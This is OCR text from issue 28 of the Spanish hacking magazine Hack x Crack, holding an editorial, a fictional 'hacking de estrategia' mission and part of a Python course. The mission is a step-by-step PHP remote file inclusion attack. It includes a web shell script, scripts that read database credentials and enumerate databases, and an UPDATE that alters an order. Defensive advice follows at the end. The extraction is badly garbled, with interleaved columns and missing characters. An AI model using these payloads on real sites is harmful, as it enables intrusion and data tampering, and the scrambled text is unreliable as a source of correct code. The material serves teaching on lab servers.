HXC 28

00028
8 414090 202756
EDIT ORIAL
DESPEGA LA SEGUNDA ETAPA DEL PROYECTO HXC.
MUCHOS CAMBIOS Y UNA AMENAZA: LA LEY MORDAZA
Estimados amigos de Hack x Crack, esta es la segunda vez que tengo el
placer de escribir esta editorial.
Tienes ante ti el nmero 28 de PC PASO A PASO // Los Cuadernos de
hackxcrack, el segundo nmero de la nueva etapa de esta revista. En la
anterior editorial te anuncibamos que toda una serie de cambios estaban
en camino, pues bien, muchos de esos cambios ya son perfectamente
visibles y otros muchos estn en el punto de mira.
El primer cambio, el ms importante, el motor, el que ha permitido que este
nmero est en tus manos y contenga importantes mejoras es un cambio
que no "se ve", es la apertura del proyecto HXC. Esta publicacin ya no
es responsabilidad de un director y unos pocos colaboradores directos, el
proyecto HXC se ha abierto y ahora somos muchas las personas que
estamos colaborando, aportando nuestros conocimientos (cuanto creemos
saber), nuestro talento (si es que tenemos alguno), nuestro tiempo (muchas
horas robadas al sueo) y, en definitiva, empujando cuanto podemos y
utilizando todos los recursos que hay a nuestro alcance.
El segundo cambio, la cabecera de La Portada (cambio de "logo"),
portada en s misma y reestructuracin completa de la maquetacin
interna. Hace mucho tiempo que tenamos pendiente mejorar el aspecto
de la revista, por fin, gracias al talento, a las aportaciones y al trabajo de
muchas personas, aqu est el primer resultado. Seguiremos avanzando
en este campo, intentaremos mejorar en cada nuevo nmero.
El tercer cambio, reactivacin los servidores de pruebas (servidores
de hack) para que puedas hacer las prcticas propuestas en la revista
sin temor a incumplir la Ley. Este punto ha sido una cruz para esta revista,
en su da se montaron los servidores PERO estaban ms tiempo fuera de
servicio que ON LINE. Bien, hemos trabajado mucho para encontrar una
solucin factible y finalmente creemos haberla encontrado. En este nmero
hemos habilitado 4 servidores (dos escenarios completos) para que puedas
completar la prctica propuesta en el primer artculo: HACKING
ESTRATEGIA. Visita nuestro foro y en concreto el enlace
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=23301
En este enlace tienes toda la informacin necesaria sobre los Servidores
de Hack del Proyecto HXC.
1.2.3.10.15.34.42.43.52.61.62.66.67.68.-
PORTADA
EDITORIAL - INDICE - DATOS
HACKING ESTRATEGIA
CURSO DE PYTHON
PONIENDO A PRUEBA EL ANTIVIRUS
EXPLOTANDO HEAP/BBS OVERFLOWS
QUIERES ESCRIBIR PARA ESTA REVISTA?
CURSO DE C
TALLER DE CRIPTOGRAFIA
VISITA NUESTRO FORO
LA LEY MORDAZA: INFORMAR ES DELITO
ATENCION AL CLIENTE
PON PUBLICIDAD EN LA REVISTA POR 99 EUROS
PIDE LOS NUMEROS ATRADOS
Moleman, a.k.a Hctor M. ---> moleman.bofh@gma l.com

am ro . . al a
eath Ma ter
//
le .
ra h ool
El cuarto cambio y caminando en la direccin de hacer HXC lo ms abierto

posible, se ha "construido" en el foro (www.hackxcrack.com) una "Sala de
Votaciones" donde ya se ha propuesto y resuelto la primera votacin: la
portada de este nmero 28 NO fue decidida por ningn director, fue decidida
por todos los integrantes del foro. No te pierdas la oportunidad de votar y
decidir sobre la revista, regstrate en el foro y utiliza tu voto para que HXC
llegue a ser como t deseas.
Muchos cambios, si, muchos avances, si, muchas cosas buenas, si pero
todava hay muchos temas pendientes en los que ya estamos trabajando
y que esperamos presentarte para el prximo nmero, estamos poniendo
todo nuestro empeo. Trabajaremos en la Web, en la organizacin interna,
en la atencin telefnica, en los pedidos, en la publicidad (imprescindible
si queremos aumentar las pginas de la revista) y, entre otras cosas, crear
un sistema de Bandeja de Entrada compartida desde donde podremos
responder TODOS los mails que nos lleguen no te lo crees?... tiempo
al tiempo, ahora tenemos "el poder" que ofrece el trabajo en grupo. Si
conseguimos organizarnos bien, todo eso y mucho ms ser posible ;)
Hay mucho por hacer, mucho!!! Pero con la ayuda del grupo que estamos
formando, parte de cuyo esfuerzo ya puedes ver reflejado en este nmero,
iremos consiguiendo cada una de las metas.
Y recuerda algo muy importante nosotros sin ti, NO SOMOS NADA!!!
Un fuerte abrazo a todos!
AZIMUT, administrador de los foros de hackxcrack
(www.hackxcrack.com).
P.D: Los artculos publicados este mes han precisado de

consulta/asesoramiento externo debido a que una nueva ley intenta
silenciarnos (silenciarnos a nosotros, a ti y a cualquier medio de
comunicacin). La llamada LEY MORDAZA es un atentado contra la
libertad de expresin que puede provocar condenas de crcel en
Espaa por el mero hecho de IMFORMAR. Al final de la revista tienes
la explicacin a esta posdata en forma de artculo de opinin.
taca dissenys
taca.dissenys@gmail.com
grupo HXC
juanmat
L
LL
irector ditorial
E
mail co tacto
director editotrans com
tulo de la publicaci
os Cuadernos de H C
C
C
ombre Comercial de la publicac
PC P
P
eb
ackxcrack com
P
P
el
C
L
da
aldeparra
(Pol
d
LC
(
el
X
gel e
Copyright Editotrans S.L.

NUMERO 28 -- PRINTED IN SPAIN
PERIOCIDAD MENSUAL
Deposito legal: B.26805-2002
Cdigo EAN:
8414090202756
Bienvenidos a esta serie de artculos en los que aprenderemos diversas tcnicas de intrusin usadas
en la realidad bajo un marco de suspense y con una trama y escenarios ficticios que te situarn
junto al atacante, nos convertiremos en agentes especiales y se nos entregar una misin que
deberemos llevarla al xito.
Soy CrashCool y os doy la bienvenida a hacking de estrategia. ;)
Documento de la misin:
Necesitamos que altere la base de datos de WADAL SL y modifique la direccin de entrega de un pedido que sospe
chamos es ilegal, deber modificar el lugar de entrega para que podamos tenderle all una trampa y capturar a
Wadalberto, jefe de WADAL SL y principal sospechoso
A continuacin le doy los datos tcnicos que nuestros agentes han conseguido:
Tanto el sistema de pedidos como la Web de la compaa comparten el mismo servidor de bases de datos, solo
es posible acceder a dicho servidor desde las propias oficinas de la empresa o desde el servidor Web donde se
aloja la pgina de la empresa, ambos servidores corren Linux como sistema operativo.
El pedido se entregar el da 12/05/05,el lugar y hora de entrega es desconocido y deber averiguarlo, segui
damente deber modificarlo siendo el nuevo destino: C\Secreta N 99 Wadalbertia
La Web de WADAL SL se encuentra en http://172.16.1.2
Mucha suerte en su misin
1- Trazando el esquema de ataque

Tenemos que infiltrarnos en el servidor de bases de datos,
la nica manera de hacerlo es desde el servidor Web o
desde las oficinas de WADAL SL.
Deslizarnos desde un helicptero por la rejilla de
ventilacin del edificio de WADAL.SL para acceder a las ofi
cinas y procurar que no se nos caiga la gota de sudor al
suelo, se lo dejaremos a Tom Cruise, nosotros vamos a in

tentar infiltrarnos en la base de datos desde el servidor
Web.
El escenario se nos presenta as: (ver imagen 1)
Lo que haremos ser lo siguiente:
Nos infiltraremos en el servidor Web
A travs de ah conectaremos con el servidor
BBDD
mos resultados, auditaremos cada uno de

los servicios que corra el servidor.
Vistamos la Web para comenzar la audi
toria de la aplicacin.
http://172.16.1.2 (ver imagen 2)
Visitamos las distintas secciones de la
Web y nos fijamos en el enlace de cada
seccin:
http://172.16.1.2/index.php?seccion=i
nicio.html
http://172.16.1.2/index.php?seccion=
empresa.html
procuctos.html
contacto.html
Imagen 1
Esto nos hace sospechar que nos en
contramos ante un peligroso error de
programacin, ms conocido como re
mote file inclusin , la base de este bug
es la inclusin de un archivo en el cdigo de la Web, el cual se ejecutar en el
propio servidor.
Podemos deducir que en el cdigo de
index.php encontraremos en alguna
parte algo parecido a esto:
<?php
include($ GET['seccion']);
?>
Como podemos ver seccion es una va

riable que se recoge con GET y se inclu
ye el nombre del archivo que contenga.
As pues, esto:
empresa.html
equivaldra a:
Imagen 2
<?php
include('empresa.html');
Visualizaremos las bases de da

tos alojadas para seleccionar la
que nos resulte sospechosa de
ser la encargada de alojar los pe
didos.
Visualizaremos las tablas de esa
base de datos y haremos una
consulta a dicha tabla para visua
lizar su contenido
Alteraremos la tabla y finaliza

remos el ataque.
2- Preparando el ataque
Lo primero que haremos ser una audito
ria al servidor, para ello primero auditare
mos la aplicacin Web y si no consegui
?>
La sentencia include de PHP permite por

defecto incluir archivos remotos, si
montramos un servidor Web en nues
tro PC http://172.16.1.45 y guardra
mos empresa.html en el directorio raz
de nuestro servidor, al acceder a:
http://172.16.1.45/empresa.html no
notaramos diferencia alguna que acce

der por http://172.16.1.2/index.php?
seccion=empresa.html , pero si vamos
ms all, Qu pasara si creamos un
script en PHP? el cdigo que programe
mos se ejecutara en el servidor Web.
2.1 Diseando los scripts para la

misin
Una vez que podemos ejecutar cdigo
arbitrario dentro del servidor, tenemos
acceso a l, y por tanto al servidor
BBDD.
Sabemos que la Web comparte el mis
mo servidor de bases de datos que con
tiene el pedido que tenemos que modifi
car, por tanto en algn lugar la aplicacin Web conectar con dicho servidor
BBDD y por tanto tendr los datos de
acceso , es decir el nombre de usuario,
contrasea e IP del servidor BBDD.
Para localizar dichos datos tendremos
que navegar tanto por el directorio de la
Web, como tener la posibilidad de ver el
fuente de los archivos contenidos en l.
La forma de acceso que tenemos es por
medio del bug de RFI (Remote File
Inclusin) as que la forma de realizar
dichas acciones ser mediante la
programacin y posterior inclusin de
scripts en PHP.
Necesitamos pues:
Script que nos liste los archivos
del directorio Web
Script que nos muestre el con
tenido de un archivo
Para esta labor explicar 2 posibilida
des, hacer uso de funciones propias de
PHP para dicho fin o bien utilizar funcio
nes de ejecucin de comandos , que
sera algo as como utilizar la funcin
system de C; que nos permitira ejecu
tar comandos como los que ejecutara
mos en una shell de dicho servidor, con
los permisos claro est de los que cons
te el usuario bajo el que corriera el ser
vidor Web.
Imagen 3
Imagen 4
cficamente deshabilitadas; o bien las
inhabilitarn indirectamente configurado
PHP en modo seguro.
El uso de alguna de estas funciones pa
ra nuestra misin nos solucionara los
dos scripts que tenemos que progra
mar:
Para el listado de archivos:
2.1.2 Usando funciones de php

Con esta tcnica nos saltaremos las res
tricciones que supone el uso de funcio
nes de ejecucin de comandos y podre
mos continuar la misin an con PHP en
modo seguro.
<?php
Script que muestra el listado de un di

rectorio:
system('ls');
?>
Para visualizar el contenido de un archivo:
<?php
//dir.php
$directorio=opendir(".");
<?php
system('cat archivo.php');
while ($archivo = readdir($directorio))
?>
o siendo ms prcticos:
//shell.php
system($ GET['comando']);
2.1.1 Usando funciones de

ejecucin de comandos
Nota
Para configurarlo en modo seguro editaremos php.ini y mo
dificaremos el valor de safe mode:
; Safe Mode
;
safe mode = On
echo "$archivo<br>";
closedir($directorio);
?>
<?php
?>
El problema de estas funciones es que

al ser bastante peligrosas para la segu
ridad de un servidor, por regla general
en una proteccin decente, estn espe
y lo usaramos : shell.php?comando=
[aqu el comando]
El script abre el directorio actual, lee

cada archivo que se encuentre en l y lo
muestra por pantalla.
Nota
Un curso de programacin PHP se escapa del mbito del ar
tculo; podrs encontrar uno en revistas anteriores, o bien
hacer uso del buen amigo Google para profundizar ms en
este fantstico lenguaje.
http://172.16.1.45/dir.php
<?php
/* dbs.php */
include("db.php"); //incluimos los datos de acceso
$cnx=mysql connect($servidor,$user,$password); //conectamos al servidor
$dbs = mysql query("SHOW DATABASES"); //ejecutamos la consulta
echo "<table width=\"100\" border=\"1\">\n";
echo "<tr><td><b>DB</b></td></tr>\n";
while($db = mysql fetch row($dbs)){ //mostramos cada uno de los resultados
echo "<tr>\n";
echo "<td>".$db[0]."</td>\n";
Obtendramos como salida el listado del

directorio de nuestro servidor, ya que el
servidor de WADAL SL hara la peticin
de dir.php a nuestro servidor y ste al
tener una extensin ejecutable por el
servidor entregara la salida del script,
o sea el listado de nuestro directorio.
Elegimos como extensin, por ejemplo
dir.inc y cat.inc , seguidamente lo eje
cutamos obteniendo el listado del di
rectorio de la Web de WADAL SL
echo "</tr>\n";
}
echo "</table>\n";
mysql close($cnx);//cerramos la conexion
?>
http://172.16.1.45/dir.inc
Listado 1
(ver imagen 3)
Sabemos que desde index.php se tiene
acceso a la base de datos, por lo que o
bien los datos de acceso se encuentran
en index.php o bien en algn archivo
secundario. Viendo los archivos, nos lla
ma la atencin db.php , veamos su con
tenido haciendo uso de cat.php
http://172.16.1.45/cat.inc&archivo=db
.php (ver imagen 4)
Imagen 5
<?php
/* tablas.php */
mysql select db("gestion pedidos",$cnx); //seleccionamos la base de datos
echo "<tr><td><b>TABLA</b></td></tr>\n";
$tablas=mysql query("SHOW TABLES"); //ejecutamos la consulta
while($tabla = mysql fetch row($tablas)){ //mostramos cada uno de los resultados
echo "<tr>\n";
echo "<td>".$tabla[0]."</td>\n";
echo "</tr>\n";
}
echo "</table>\n";
mysql close($cnx); //cerramos la conexion
?>
Listado 2
Script que muestra el contenido de un
archivo:
<?php
//cat.php
show source($ GET['archivo']);
?>
3 Iniciando el ataque
En nuestro PC arrancamos el Apache (o
cualquier otro servidor Web) y situamos
en el directorio raz los archivos dir.php

y cat.php , usaremos stos en lugar de
shell.php por motivos explicados ante
riormente.
Lo primero que haremos ser renom
brar estos archivos a una extensin in
ventada, que nuestro servidor Apache
no sea capaz de reconocer, para qu?
si incluyramos los archivos en el servi
dor de WADAL SL tal que as:
El contenido del archivo db.php es el

buscado ;)
Ya estamos en disposicin de adentrar
nos en el servidor BBDD.
3.1 Infiltrndonos en el servidor

bbdd
Sera muy sencillo introducir esos datos
en nuestro phpMyAdmin y gestionar di
rectamente la base de datos desde
nuestro PC, pero tenemos constancia de
que el servidor de base de datos solo
puede hablar con el servidor Web y
con las oficinas de WADAL SL, as que
tendremos que continuar desarrollando
la misin a travs del pequeo gran bug
de inclusin.
3.1.1 Visualizando las bases de da

tos del servidor bbdd
Ahora programaremos un script que vi
sualizar las bases de datos del servi
Nota
En los siguientes puntos 'hablaremos' con el servidor BBDD a tra
vs de consultas SQL, podrs encontrar un curso excelente en
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=12222
dor, para ello tendremos que conectar

con el servidor y ejecutar la consulta
SQL SHOW DATABASES(ver listado1)
Ahora incluiremos este script en el ser
vidor de WADAL SL previo cambio de
extensin.
http://172.16.1.2/index.php?seccion=htt
p://172.16.1.45/dbs.inc
(ver imagen 5)
Imagen 6
<?
/* campos.php */
$campos=mysql query("DESCRIBE pedidos pendientes"); //ejecutamos la sentencia
echo "<tr><td><b>CAMPO</b></td><td><b>TIPO</b></td>\n";
while($campo= mysql fetch row($campos)){ //visualizamos cada uno de los campos
echo "<tr>\n";
echo "<td>".$campo[0]."</td><td>".$campo[1]."</td>\n";
echo "</tr>\n";
}
echo "<table>\n";
?>
Listado 3
Excelente, hemos obtenido las bases de

datos que alberga el servidor BBDD:
gestion administrativa, ges
tion empleados, gestion pedidos,
web empresa
Las 3 primeras podran ser pertenecien
tes a la empresa y la ltima pertene
ciente a la Web, as pues la informacin
que nos daban en la misin era cierta y
probablemente la base de datos que al
berga los pedidos es la tercera (ges
tion pedidos)
3.1.2 Visualizando las tablas de la

base de datos gestion pedidos
Para ello procederemos de igual forma,
ejecutando la sentencia SQL SHOW
TABLES (ver listado2)
Ahora incluiremos este script en el ser
vidor de WADAL SL previo cambio de
extensin.
http://172.16.1.45/tablas.inc
(ver imagen 6)
Imagen 7
Las tablas que contiene la base de datos

gestion pedidos son:
pedidos rechazados, pedi
dos pendientes, historial pedidos
Llegados a este punto de intrusin esta
mos a un paso de completar con xito
la misin, hemos localizado la tabla que
contiene los pedidos pendientes, tan so
lo nos queda ver la estructura de dicha
tabla, visualizar y modificar el pedido.
3.1.3 Visualizando la estructura de

la tabla pedidos pendientes
Imagen 8
Esto se consigue ejecutando la

sentencia SQL DESCRIBE
<?
/* pedido.php */
$pedidos=mysql query("SELECT * FROM pedidos pendientes WHERE dia='2005-05-12'");
echo "<table width=\"100%\" border=\"1\">\n";
echo "<tr><td><b>DIA</b></td><td><b>HORA</b></td>";
echo "<td><b>LUGAR</b></td><td><b>PRODUCTO</b></td>\n";
while($pedido= mysql fetch row($pedidos)){ //visualizamos cada uno de los campos
echo "<tr>\n";
foreach ($pedido as $campo)
echo "<td>".$campo."</td>\n";
echo "</tr>\n";
echo "<table>\n";
}
?>
Listado 4
<?php
//modificacion.php
$query="UPDATE pedidos pendientes SET lugar="
."'C\\\\Secreta N 99 Wadalbertia' WHERE dia ='2005-05-12'";
mysql query($query);
?>
pedidos pendientes, procedamos a la

programacin del script:(ver listado3)
Seguidamente lo incluimos, previo cam
bio de extensin.
http://172.16.1.45/campos.inc(ver
imagen 7)
Y obtenemos que los campos de la tabla
pedidos pendientes son: dia, hora, lu
gar, producto.
Ya solo nos queda ejecutar la consulta
para listar los pedidos del da 12/05/05.
3.1.4 Visualizando los pedidos del

dia 12/05/05
Lo primero ser construir la sentencia
SQL que nos listar los pedidos:
SELECT * FROM pedidos pendientes
WHERE dia=2005-05-12
Y seguidamente el script que la ejecu
te:(ver listado 4)
Lo incluimos:
http://172.16.1.45/pedido.inc
Listado 5
(ver imagen 8)
Y ah esta!!
Rpidamente apuntamos los datos en
nuestro informe, y procedemos a modi
ficar la direccin del pedido a C\Secreta
N 99 Wadalbertia
3.1.5 Modificando la direccin del

pedido
Formamos la ltima sentencia SQL que
nos permitir finalizar la misin:
Imagen 9
<?php
$seccion=$ GET['seccion'];
switch($seccion)
{
case 'inicio': include("inicio.html"); break;
case 'empresa': include("empresa.html"); break;
case 'productos': include("productos.html"); break;
UPDATE pedidos pendientes SET lu

g a r = ' C \ S e c r e t a N 9 9 Wa d a l b e r t i a '
WHERE dia ='2005-05-12'
Y creamos el script que la ejecuta: (ver
listado 5)
La ejecutamos:
case 'contacto': include("contacto.html"); break;

default: include("404.shtml");
}
?>
Listado 6
8
Nota
El formato de fecha para un campo date es: ao-mes-da
http://172.16.1.45/modificacion.inc
Por ltimo volvemos a usar el script pe
dido.php para asegurarnos de la
modificacin llevada a cabo.
http://172.16.1.45/pedido.inc
(ver imagen 9)
Lo conseguimos!
Gracias a su infiltracin hemos

logrado intervenir un cargamento
de embudos que esconda 12
millones de euros en diamantes.
Wadalberto, nico detenido, ha
pasado a disposicin judicial.
4 Protegindonos de este ti
po de ataques
Como veis un simple error de
programacin Web (RFI) , nos ha per
mitido realizar una infiltracin hasta el
mismo servidor de bases de datos de la
empresa, nosotros hemos alterado un
dato, pero de igual manera podramos
haber sacado un completo back-up o in
cluso borrar el contenido de todas las
tablas, y todo debido a un error de
programacin, ves la importancia que
tiene la programacin segura?
4.1 Por parte del programador de la

web
Lo principal es concienciarnos de la im
portancia que tiene la programacin se
gura, la anterior empresa ficticia pudo
haber frenado nuestro ataque con unas
recomendaciones que veremos a
continuacin.
Evitando a toda costa la inclusin de va
riables dentro de un include, inclu
de once, require, require once sin an
tes verificar su contenido.
te funciones como file exists() y trata

miento de cadenas para evitar que con
tenga lugares externos (http:// , ftp://
...)
Si queremos tener la total seguridad,
podemos usar un switch que contemple
todos los posibles valores permitidos de
la variable $seccion y asociarlos a un
archivo a incluir:(ver listado 6)
La sentencia de dispersin evaluara el
valor de la variable $seccion e incluira
el archivo al que le asociamos, contando
que se usara este script en la web de la
misin los enlaces podran quedar as:
http://172.16.1.2/index.php?seccion=inicio
http://172.16.1.2/index.php?seccion=noticias
...
.
Con esto ya no habra peligro alguno de
remote file inclusion , adems al no in
cluir en el enlace la propia extensin
( para el ejemplo: .html) como pasaba
antes, evitaremos que nuestra Web se
visualice como un claro objetivo.
Otra recomendacin es evitar que se
muestren errores de nuestras funciones
para evitar que el atacante consiga
informacin, se consigue anteponiendo
@ a la funcin:
@include(....) , @mysql connect(..),
@mysql query(...) ... etc.
De esta forma, aunque dentro del inclu
de vaya un archivo inexistente, no se
visualizaran los errores al visitar la
web.
4.2 Por parte del administrador del

servidor
Para lograr frenar ataques de este tipo
y evitar al mximo las infiltraciones se
guiremos unos consejos bsicos:
Ejecutar PHP/Apache en un
usuario con los mnimos privi
legios necesarios.
<?php
//ERROR!!!!!!!
El cdigo PHP que ejecutemos a
include($ GET['seccion']);
?>
Para este caso verificaramos que la va

riable $seccion solo contenga archivos
del propio directorio de la Web, median
Nota
si te interesa el tema de la programacin segura en PHP,
puedes visitar la web http://phpsec.org (PHP Security
Consortium) la cual est completamente dedicada a la
difusin de la programacin segura en PHP.
travs de RFI se ejecutar con

estos permisos, imaginad qu pa
sara si el servidor se ejecutara
por un usuario con privilegios de
root y un atacante consiguiera ac
ceso por RFI
PHP en modo seguro:
Deshabilita o restringe funciones
consideradas peligrosas, puedes
encontrar la lista detallada en
http://es2.php.net/features.safemode
Se consigue activndolo desde
php.ini (Safe mode=On)
Deshabilitar el acceso remo
to a archivos
De esta forma al atacante le ser
imposible incluir archivos remotos,
se consigue modificando el valor
de allow url fopen en php.ini:
; Whether to allow the treatment of
URLs (like http:// or ftp://) as files.
allow url fopen = Off
Usando Mod security
Mod security es un mdulo para
Apache que funciona como un sis
tema de deteccin de intrusos a
nivel de pedidos HTTP, con las re
glas adecuadas puede prevenir
infinidad de ataques.
Puedes encontrar mas informacin sobre esta utilidad y algunos ejemplos de reglas en
http://www.hackxcrack.com/php
BB2/viewtopic.php?t=20732
5 Despedida
sta ha sido la primera misin, espero
que os haya gustado y haya despertado
en vosotros una curiosidad que os lleve
a seguir investigando y profundizando.
Os espero en la prxima, en un escena
rio distinto, con ms tcnicas de
infiltracin usadas en la realidad, os es
pero aqu, en hacking de estrategia.
Autor: CrashCool
Quieres practicar este artculo en la vida REAL?
nsi?
htt
//
.hack
crack.com/
h
/
... entonces...
A QU
ESTS ESPERANDO?
e to c. h t
o
encontrar
Hemos preparado 4 servidores (dos escenarios) para que
nformac
n acerca
e tesinart
c lo.a represalias legales.
puedas hacer
la prctica
temor
Tienes la informacin necesaria en ESTE enlace:
http://www.hackxcrack.com/phpBB2/ viewtopic.php?t=23301
Por Moleman (a.k.a Hctor M.)

Bienvenido al Episodio 2 de este Curso de Python. Si os gust el primero este os encantar. Y sin
ms dilacin entremos al trapo.
Para no perder las buenas costumbres aqu van los progra
mas regalito de la casa.
echo-server.py
#!/usr/bin/env python
import socket,sys
def eco(conn,dir_conn):
print 'Aceptando conexion de:',dir_conn[0],'en puerto:',dir_conn[1]
while 1:
data conn.recv(1024)
if not data: break
conn.send('Echo -> '+data)
conn.close()
print 'Fin de conexion de:',dir_conn[0],'\n'
if (len(sys.argv)! 2):
print './echoserver.py [puerto]'
sys.exit(10)
maquina ''
puerto int(sys.argv[1])
s socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((maquina,puerto))
s.listen(5)
while 1:
conn,dir_conn s.accept()
eco(conn,dir_conn)
echo-client.py
import sys,socket
mens ['Saludos...']
if len(sys.argv)<3:
print './echoserver.py [ip] [puerto] (mensaje1 | mensaje2 | ... | mensajeN)
10
sys.exit(10)
elif len(sys.argv)>3:
mens sys.argv[3:]
print sys.argv
maquina sys.argv[1]
puerto int(sys.argv[2])
print 'Conectando a',maquina,'...'
s socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((maquina, puerto))
for linea in mens:
s.send(linea)
data s.recv(1024)
print 'Recibido:',data
s.close()
En el anterior artculo comente que nos quedaban unos

cuantos tipos de datos por comentar. Estos son: listas, dic
cionarios y tuplas.
Primero haremos una breve revisin y ampliacin.
Ya comentamos las cadenas. Una cadena es simplemente

un conjunto de caracteres entrecomillado.
Las funciones que podemos usar con cadenas son:
int(): convierte una cadena que representa un entero en un entero
float(): convierte una cadena flotante en un flotante
str(): el inverso de los dos anteriores
ord(): coge una cadena de un solo carcter y devuelve su ASCII entero
chr(): coge un entero entre 0 y 255 y devuelve el carcter corres
pondiente en ASCII
len(): imprime la longitud de la cadena que se le pase (el
nmero de caracteres)
los mtodos y funciones asociados a las

listas.
Tambin disponemos de los mtodos.
Antiguamente para operar con cade
nas se usaban las funciones del mdulo
string, mas ahora dicho mdulo ha que
dado obsoleto. Para sustituirlo existen
los mtodos.
Un mtodo es simplemente una
operacin sobre una o varias cadenas.
Se invocan as: cadena.mtodo() (con
parmetros si los requiere)
>>> cadena 'Mi cadena'
>>> print cadena.upper()
MI CADENA
>>>
El mtodo upper() por ejemplo, con
vierte en maysculas el contenido de
una cadena. Otros mtodos usados son
por ejemplo: lower() que convierte en
minsculas, split() que corta la cadena
por cada separador dado y la convierte
en una lista o replace() que sustituye
los caracteres que se especifiquen de
una cadena por otros tambin especifi
cados. Segn vayamos viendo algunos
los iremos explicando aunque si tenis
curiosidad podis usar la funcin dir().
Esta funcin devuelve los mtodos de
un tipo de datos dado (vale para cade
nas, listas, diccionarios,...). Veamos su
uso:
>>> dir(cadena)
['__add__', '__class__', '__contains__',
'__delattr__', '__doc__', '__eq__', '__ge__',
'__getattribute__', '__getitem__', '__get
n e w a rg s _ _ ' , ' _ _ g e t s l i c e _ _ ' , ' _ _ g t _ _ ' ,
'__hash__', '__init__', '__le__', '__len__',
'__lt__', '__mod__', '__mul__', '__ne__',
'__new__', '__reduce__', '__reduce_ex__',
'__repr__',
'__rmod__', '__rmul__',
'__setattr__', '__str__', 'capitalize', 'center',
'count', 'decode', 'encode', 'endswith',
'expandtabs', 'find', 'index', 'isalnum', 'isal
pha', 'isdigit', 'islower', 'isspace', 'istitle', 'isu
pper', 'join', 'ljust', 'lower', 'lstrip', 'replace',
'rfind', 'rindex', 'rjust', 'rstrip', 'split', 'splitli
nes', 'startswith', 'strip', 'swapcase', 'title',
'translate', 'upper', 'zfill']
>>>
Estos serian todos los mtodos y funcio
nes asociados a las cadenas en general.
Si hiciramos dir() con una lista saldran
Tambin indicar que podemos acceder a

un carcter especfico de la cadena indi
cndole la posicin del carcter, empe
zando a contar desde el cero, entre cor
chetes. As:
>>> print cadena[4]
a
>>>
Imprimimos la posicin 4, que corres
ponde al quinto carcter de la cadena,
en este caso la a. Dentro de este mis
mo apartado tenemos que comentar el
operador slice (corte) que se represen
ta con dos puntos (:). Este operador
nos sirve para seleccionar un rango de
elementos. As:
>>> print cadena[3:6]
cad
>>>
mostramos las letras de la 3 a la 5. La
teora es as: el slice selecciona todos
los elementos entre [x:z-1]. Si omiti
mos el primer valor ([:z]) contara desde
cero hasta z-1 y si omitimos el ultimo
([x:]) contara desde x hasta el final.
Sencillo y til.
Continuemos.
Una lista en un conjunto de datos de

cualquier tipo (incluso de varios tipos
diferentes al mismo tiempo), y se decla
ra entre corchetes ([]). Veamos un
ejemplo:
>>> lista [2,'hola']
>>> print lista
[2, 'hola']
>>>
Como vemos, hemos creado una lista
que contiene un entero y una cadena y
luego la hemos imprimido entera. Si
quisiramos imprimir slo un elemento
de la lista deberamos indicarle la
posicin del elemento a imprimir.
>>> lista [2,'hola',3.14159]
>>> print lista[1]
hola
>>>
Los elementos se enumeran empezando

por el cero, por lo que si queremos im
primir el 'hola', tenemos que indicarle
que imprima el elemento uno (la lista
contiene tres elementos: cero, uno y
dos). Incluso si el elemento al que acce
diramos dentro de la lista fuera una
cadena podramos acceder a un carcter
especfico dentro de la cadena, dentro
de la lista. Mucho lo? Un ejemplo:
>>> lista [2,'hola',3.14159]
>>> print lista[1][3]
a
>>>
Hemos accedido a la cadena 'hola' y
luego hemos accedido a la cuarta letra
de la cadena, la o :)
Adems podemos usar el slice con las
listas.
Las listas tambin tienen mtodos pro
pios para operar con ellas. Si hacemos
un dir()
>>> dir(lista)
['__add__', '__class__', '__contains__',
'__delattr__', '__deli
t e m _ _ ' ,
'__delslice__', '__doc__', '__eq__',
'__ge__', '__getattribute__', '__getitem__',
'__getslice__',
'__gt__', '__hash__',
'__iadd__', '__imul__',
'__init__', '__iter__', '__le__', '__len__',
'__lt__', '__mul__', '__ne__', '__new__',
'__reduce__',
'__reduce_ex__', '__re
pr__', '__rmul__', '__setattr__', '__seti
tem__', '__setslice__', '__str__', 'append',
'count', 'extend', 'index', 'insert', 'pop', 'remo
ve', 'reverse', 'sort']
>>>
Por ejemplo, append() aade un ele
mento al final de la lista. segn veamos
los mtodos iremos explicndolos.
Tambin pueden usarse los operadores
de concatenacin (+), repeticin (*) y
la funcin len() de las cadenas sobre las
listas. Para borrar un elemento de la lis
ta usaremos: del lista[indice]
Una tupla es a todos los efectos lo mis

mo que una lista con una importante di
ferencia: las tuplas son inmutables.
Son constantes. Una vez declarados sus
valores ya no podrn ser cambiados
11
(con una pequea excepcin que co

mentaremos.)
Una tupla se declara igual que una lista
salvo que se usan parntesis en lugar
de corchetes:
>>> tupla (9,'hola')
>>> print tupla
(9,'hola')
>>>
La tuplas no tienen mtodos asociados.
Si se diera el caso de necesitar modifi
car una tupla, disponemos de las fun
ciones tuple() y list(). List() convierte
una tupla en una lista con lo que podre
mos modificarla a nuestro antojo, y tu
ple() realiza justo lo contrario: convertir
una lista en una tupla.
Pensemos en un diccionario de InglsEspaol. Buscas una palabra en ingls y

tienes la equivalencia en castellano.
Pues eso mismo es un diccionario.
Un diccionario es igual que una lista so
lo que cada elemento esta compuesto
de un ndice y su elemento asociado.
Una lista es lo mismo pero el ndice es
numrico, y no figura visiblemente
mientras que en un diccionario si es vi
sible y lo ponemos nosotros. Veamos:
>>> dicc {'hola':'adios',978:'jeje'}
>>> print dicc
{978: 'jeje', 'hola': 'adios'}
>>> print dicc['hola']
adios
>>>
Los diccionarios se declaran entre llaves
y cada par se separa entre s por dos
puntos y entre cada par por comas.
Para seleccionar un par basta con indi
carlo entre corchetes como si fuera el
ndice de una lista como podemos ver.
Disponen de sus propios mtodos que
podremos ver con dir() y tambin pode
mos usar del() para borrar un elemento
en particular como en las listas.
>>> del(dicc['hola'])
>>> print dicc
{'jaja': 'jeje'}
>>>
12
hacer con l lo que queramos. Fcil,

verdad?
Bueno, despus de todo el peazo con
los tipos de datos vamos a cambiar de
tercio y aprenderemos como crear fun
ciones dentro de nuestro cdigo. Las
funciones son una forma de reutilizar
cdigo ya que puedes llamarlas o im
portarlas desde otro programa siempre
que las necesites.
Crear una funcin es muy sencillo. Tan
solo:
def nombre_funcin(parametros):
intrucciones
....
La funcin acaba cuando se deja de ta
bular. Los parmetros de entrada son
opcionales. Se ponen si necesitamos
pasarle datos a la funcin desde el ex
terior. Veamos un par de ejemplos y os
lo aclarar. Veris que no tiene mayor
compliacin:
